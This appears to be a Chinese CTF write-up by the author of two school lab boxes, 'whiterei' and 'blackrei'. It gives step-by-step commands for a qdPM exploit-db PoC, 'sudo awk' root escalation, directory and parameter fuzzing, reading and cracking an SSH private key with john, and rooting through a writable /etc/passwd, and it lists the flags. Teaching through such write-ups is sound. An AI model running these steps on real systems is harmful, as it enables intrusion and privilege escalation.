0%

noone的校赛出题

  • whiterei

    密码是5L2g5oiR54q55aaC6ZqU6ZWc6KeG54mp

    嗯抄doubletrouble

    扫目录 /secret 里面有个图片

    然后根据在RAEDME.txt里的提示有两种方法,要么 stegsolve 看LSB隐写拿到账密,要么看出来这是github的头像设置,然后去github搜相关用户名,在提交的历史记录中拿到账密(以及poc,但认不认得出来就是另一回事了)。这里换了张难度低一点的图

    根据exploitdb里面找到这个版本的qpdm的poc:50944.py,然后python 50944.py -url http://192.168.56.101/ -u noone@2501.prj -p noone123456 拿shell

    shell: flag{nICe!TRyhardErTOgETrooT}

    sudo -l直接出是awk提权:sudo awk 'BEGIN {system("/bin/sh")}'

    root: flag{ayanamireiwakawaiiyo}

  • blackrei

    5omA6KeB5peg6Z2e6Jma5bm76L+35r+b

    嗯抄evilbox

    扫出来secret/目录,FUZZ出evil.php。ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.56.113/secret/FUZZ.php

    根据提示继续FUZZ参数名 command,或者你嗯猜是 'rei', 'Rei', 'Ayanami', 'ayanami', 'blackRei' 都对

    主页的提示应该能指向这会要去试着ssh链接,即读 /home/Ayanami/.ssh/id_rsa

    但文件加密了,先用 ssh2john 提取 hash 值,再拿 john 爆破出密码 ANGEL LOVE

    1
    2
    3
    ssh2john id_rsa > hash
    john hash --wordlist=/usr/share/wordlists/rockyou.txt
    ssh Ayanami@192.168.56.120 -i id_rsa

    shell: flag{GOoDJoB!bUtNomOReHinttHisTiMe^^}

    /etc/passwd 可以更改,openssl passwd -1 生成密码的 md5 替换掉root的密码即可

    root: flag{YOUDidIT!cONGRATULatiONsfORtHat}